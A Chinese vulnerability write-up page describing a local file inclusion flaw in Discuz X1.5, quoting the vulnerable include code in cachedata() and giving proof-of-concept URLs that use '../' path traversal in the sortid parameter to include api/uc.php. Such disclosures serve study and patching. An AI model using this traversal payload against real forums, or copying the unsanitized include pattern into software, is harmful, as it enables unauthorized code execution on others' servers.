手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >DISCUZ X1.5 本地文件包含漏洞说明
DISCUZ X1.5 本地文件包含漏洞说明
摘要:config_global.php复制代码代码如下:$_config['cache']['type']=‘file’...

config_global.php

复制代码代码如下:

$_config['cache']['type'] = ‘file’;

function cachedata($cachenames) {

……

$isfilecache = getglobal(‘config/cache/type’) == ‘file’;

……

if($isfilecache) {

$lostcaches = array();

foreach($cachenames as $cachename) {

if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {

$lostcaches[] = $cachename;

}

}

……

}

地址:

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

执行了 api/uc.php 页面代码了。

作者: Jannock

【DISCUZ X1.5 本地文件包含漏洞说明】相关文章:

Discuz!NT 2.5最新注入漏洞测试分析(图)

最新win2003 II6解析漏洞实战及应用

Foxit Reader PDF文件解析内存破坏漏洞

浅析 LxBlog V6 变量未初始化漏洞

WordPress WassUp插件 spy.php脚本含SQL注入漏洞

Toshiba Surveillix ActiveX 控件远程栈溢出漏洞

Symark PowerBroker 客户端多个本地命令溢出漏洞

多个D-Link 产品含跨站脚本攻击以及拒绝服务漏洞

DeDeCMS V5 用户验证函数转义符漏洞

Linux Kiss Server lks.c文件多个格式串处理漏洞

精品推荐
分类导航